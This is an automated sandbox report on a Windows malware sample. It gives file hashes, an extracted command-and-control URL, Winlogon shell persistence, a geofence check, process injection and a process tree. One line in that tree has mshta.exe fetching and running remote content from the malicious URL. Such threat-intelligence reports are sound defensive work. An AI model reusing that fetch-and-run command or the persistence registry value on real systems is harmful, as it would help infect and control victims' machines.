Analysis
- max time kernel: 151s
- max time network: 144s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 08/01/2024, 23:56
Behavioral task: behavioral1
- Sample: 4ccacea000c555b1a333175803ba0af5.exe
- Resource: win7-20231215-en
Behavioral task: behavioral2
- Sample: 4ccacea000c555b1a333175803ba0af5.exe
- Resource: win10v2004-20231215-en
General
- Target: 4ccacea000c555b1a333175803ba0af5.exe
- Size: 691KB
- MD5: 4ccacea000c555b1a333175803ba0af5
- SHA1: 8e919e3a04036ee3b5122d3fb047d907d23d1e3d
- SHA256: f81cea3cf23dc2d75ad5c9deb707b07807c90a55520e441a7630aa7573f95bb0
- SHA512: 0bca51112c16fe66ac910289bf665168f25d71c4101123987c0afafdc698b93549eaf82e64be315ff9296cb3710a7d6375543952ab8e13f8d0aaf8de795d13ea
- SSDEEP: 12288:MSJsWPOGw+qYwxPsw5gubWPRJ+wsHdLgRU3M7tToSGRpQ7E5x36NuP:MSnwKwauipJXlCc7tkSGRWix36
Malware Config
- Extracted URL: http://rerererererere.com/inst.php?id=forbidden
Signatures
- Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  Set value (str) by z.exe: \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\palladium.exe"
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried by 4ccacea000c555b1a333175803ba0af5.exe: \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation
  Key value queried by z.exe: \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation
- Executes dropped EXE (1 IoC)
  PID 2636: z.exe
- YARA rule match: upx (behavioral2)
  behavioral2/memory/4908-0-0x0000000000400000-0x0000000000507000-memory.dmp (also matched again as 4908-17)
  behavioral2/files/0x000600000002312c-12.dat
  behavioral2/memory/2636-16-0x0000000000400000-0x00000000007FC000-memory.dmp (repeated matches on the same region as 2636-26 through 2636-41)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID 2636: z.exe (64 events)
- Suspicious use of SetWindowsHookEx (2 IoCs)
  PID 2636: z.exe (2 events)
- Suspicious use of WriteProcessMemory (9 IoCs)
  PID 4908 (4ccacea000c555b1a333175803ba0af5.exe) wrote to memory of PID 2636, procid_target 90 (3 events)
  PID 2636 (z.exe) wrote to memory of PID 2364, procid_target 92 (3 events)
  PID 2636 (z.exe) wrote to memory of PID 5028, procid_target 93 (3 events)
Processes
- C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe (PID 4908)
  Command line: "C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\z.exe (PID 2636)
    Command line: "C:\Users\Admin\AppData\Roaming\z.exe" forbidden
    - Modifies WinLogon for persistence
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\mshta.exe (PID 2364)
      Command line: "C:\Windows\System32\mshta.exe" http://rerererererere.com/inst.php?id=forbidden
    - C:\Windows\SysWOW64\cmd.exe (PID 5028)
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat" "
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 167B
  MD5: e5a2cf708be039ebe72233673c1f2ac7
  SHA1: cca4b5f8c08e07779f4eddd7e3c960d7f68078f8
  SHA256: 1f67a80290e77b7ec48c8b676bcc076ff5b271e2caf17352b1880d65a956e43c
  SHA512: 0d47a1ccf419c4cb8fc1a25b35470ba3b51e49a6045fe1efcd533ebbe9d69a92a1a7b60f2666e1419613c0bd45ffd128623adb11c313c1b3749727f5a4a9f645
- Filesize: 472KB
  MD5: 46577e2d36b664cf1cb8ec38b2889503
  SHA1: 3a239cc9b69a1501e3a43a746f2575da0a35bea8
  SHA256: a91320a68ef0f4103d2f8f28910f85ab4fc47ab496170e3b09f7856e527e38f9
  SHA512: 9c17c1171b6f3c413865adedfaf05837e506cb7805cbbd6ba6806c1cd1691ae11ab6b17bc1fb171dd800892eb5ec1600954f73aa1c4a531dba5e2798f01dda8c